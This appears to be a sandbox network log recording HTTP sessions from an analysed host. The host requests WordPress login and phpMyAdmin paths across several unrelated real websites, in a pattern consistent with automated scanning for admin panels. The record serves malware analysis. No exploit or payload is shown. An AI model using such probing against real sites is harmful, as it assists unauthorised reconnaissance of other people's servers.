2023-12-22 20:14:59 UTC	1079	IN	HTTP/1.1 404 Not Found Content-Length: 2929 Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276099.4931709926797312280 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:14:59 GMT X-Served-By: cache-dfw-kdfw8210138-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaljisb3AquZ75AMu3lSzmWH/bf8RAwRVMHlkGvQMWkFNuMRNRaVhJq43k38tPlVzdpQ==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg== Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:14:59 UTC	173	IN	Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
2023-12-22 20:14:59 UTC	1252	IN	Data Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
2023-12-22 20:14:59 UTC	1252	IN	Data Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
2023-12-22 20:14:59 UTC	252	IN	Data Raw: 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	62155	34.206.39.153	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	196	OUT	GET / HTTP/1.1 Host: www.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxH\|ZYXxH User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	2197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6kHVQ== Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Access-Control-Allow-Headers: * Access-Control-Max-Age: 86400 Link: </packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</packs/js/ads-4b8a83b0bbaf60e589e0.js>; rel=preload; as=script; nopush,</packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</assets/application-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</assets/style-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</assets/generic_lander-8c18c01aab6b1d2ebf833256e6dbdff67d20807e508d45e59875a48594655ea7.css>; rel=preload; as=style; nopush,<///ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"b42e50d4500859db5bba3956bc1347dd" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=1hNav4mQR4OCfwoECDWNLIkQ9YFwlQaXSpH2PStAvQ3m2v4%2BQ2I9vyolhkN7lPc09qrI%2FUwjzfcRFiQJ7TzB1mPE5VrVVlrk93eO3Jkx6lhazqd32D0h%2FIf57W41gJp2vMdRe4BeUMBRtgoN7qBGzR2RfVBGK0P2pByHiuu%2BquLzqgoygNTvwL1mYzgRAV4aCVhfaP0Hh4GXdv%2Fzf3RWKmUbTY7vaLI88cq6FuIUYyMKunh9z8r5q5kMzJmJdLzZIQm%2FSnUIyjdJ0NKja%2Fn9s83Hhiq503a03ltM--vhCbxKgjAQHxnAej--R8wke1vHgUMFOgDs1X7o2Q%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 3c940921-d766-4f2a-857b-a0ea2fd3e1b5 X-Runtime: 0.107189 Set-Cookie: SERVERID=vpc4\|ZYXxI\|ZYXxH; path=/
2023-12-22 20:14:59 UTC	11415	IN	Data Raw: 38 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 27 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 2f 33 2f 53 72 56 37 50 38 41 73 54 48 4d 46 53 70 50 6d 59 62 79 76 32 50 6b 41 43 48 77 6d 47 39 5a 2b 31 49 46 5a 71 33 76 41 35 34 49 4e 37 70 51 63 47 6e 68 67 4e 6f 2b 38 53 4e 39 72 2f 4b 74 55 57 43 62 39 4f 50 71 54 66 57 4d 31 4e 34 77 2f 45 55 43 41 77 45 41 41 51 3d 3d 5f 4b 4d 58 58 31 77 68 45 2b 4c 71 57 6c 6e 42 4f 49 42 30 78 4a 4c 77 70 7a 58 54 56 49 56 58 77 74 50 78 42 71 6f 37 54 74 77 63 67 63 54 62 43 52 58 36 6c 67 6e 47 42 46 63 4b 53 70 64 51 51 55 37 39 39 6b 5a 30 6d 4a 4a 55 38 54 33 68 52 45 36 Data Ascii: 80d<!DOCTYPE html><html data-adblockkey='MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	62164	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	179	OUT	GET /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	951	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=124ncvsfuhf7miuisnljjdjbgg; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UERY8nfsE4Wa02aeGH1FLhntbbMoQqO%2FVhhslckW3GCyq5cL%2Fqvl2eQv%2Ff4sgJYys15VatKTRMbhYSZ01hm9ZswPGj7Tg%2F%2BDtUJCOakdyAKzH8Y%2F%2F21Sz8PKuq%2FYrYE1nQs%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c5ded1746d-MIA
2023-12-22 20:14:59 UTC	418	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 62 75 74 74 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 Data Ascii: ps://theproducebox.com/wp-includes/css/buttons.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://th
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 63 75 72 72 65 6e 74 2d 70 61 73 73 77 6f 72 64 22 20 73 70 65 6c 6c 63 68 65 63 6b 3d 22 66 61 6c 73 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 20 77 70 2d 68 69 64 65 2d 70 77 20 68 69 64 65 2d 69 66 2d 6e 6f 2d 6a 73 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 77 20 70 61 73 73 77 6f 72 64 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 Data Ascii: assword-input" value="" size="20" autocomplete="current-password" spellcheck="false" required="required"/><button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password"><span class="d
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 37 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 34 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2d 6a 73 22 3e 3c 2f 73 63 Data Ascii: t" src="https://theproducebox.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></sc
2023-12-22 20:14:59 UTC	1224	IN	Data Raw: 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 69 31 38 6e 2d 6a 73 2d 61 66 74 65 72 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 77 70 2e 69 31 38 6e 2e 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 28 7b 27 74 65 78 74 20 64 69 72 65 63 74 69 6f 6e 5c 75 30 30 30 34 6c 74 72 27 3a 5b 27 6c 74 72 27 5d 7d 29 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 2d 6d 65 74 65 72 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 70 77 73 4c 31 30 6e 3d 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 50 61 73 73 77 6f 72 64 20 73 74 72 65 6e 67 74 68 20 75 6e 6b 6e 6f 77 6e 22 2c 22 73 68 6f 72 74 22 Data Ascii: cript" id="wp-i18n-js-after">//<![CDATA[wp.i18n.setLocaleData({'text direction\u0004ltr':['ltr']});//...</script><script type="text/javascript" id="password-strength-meter-js-extra">//<![CDATA[var pwsL10n={"unknown":"Password strength unknown","short"
2023-12-22 20:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	62148	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	627	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/phpmyadmin/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5OH0pucPmw%2BM1nfXA%2BHmW6Wz9oAmkvUBXz2IwaSidXdDmTWBpvw7%2FnMk0S35kpY4B8SnxWVrxcrugQTrSq1x4UBWZh634Q6RnKkQXrMuL4lE0b%2F7VbQupLX5AsIiWcCH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c5eb6bb3bf-MIA
2023-12-22 20:14:59 UTC	251	IN	Data Raw: 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: f5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/phpmyadmin/">here</a>.</p></body></html>
2023-12-22 20:14:59 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2023-12-22 20:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	62150	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	178	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	869	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: s-maxage=10 Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: PHPSESSID=vraklm386fium8pc9dsp24h090; path=/ X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2qo49HhTrJf4rvmQdn0QL85SrMhZL2uUq7kMqqP2Q1fIOf2it9eB0CsMmtDk0qKjTcI7egvCZkaZp9pWIe%2Be78UG0mXoSdZCQ%2Bw92iH1BSIbA6g9yrEX92pClKtgiAf5xHQb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c5eaa4743e-MIA
2023-12-22 20:14:59 UTC	500	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 09 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 2000<!DOCTYPE html><html lang="en-US" class="no-js"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 70 62 32 30 32 31 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d Data Ascii: -icon" href="https://theproducebox.com/wp-content/themes/tpb2021/assets/images/favicon.ico" /> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.7 - https://yoast.com/wordpress/plugins/seo/ -
2023-12-22 20:14:59 UTC	1369	IN	Data Raw: 72 6f 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 38 2f 54 50 42 5f 4c 6f 67 6f 5f 47 72 65 65 6e 5f 42 61 63 6b 67 72 6f 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 37 34 35 2c 22 68 65 69 67 68 74 22 3a 37 34 34 2c 22 63 61 70 74 69 6f 6e 22 3a 22 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 22 7d 2c 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e Data Ascii: 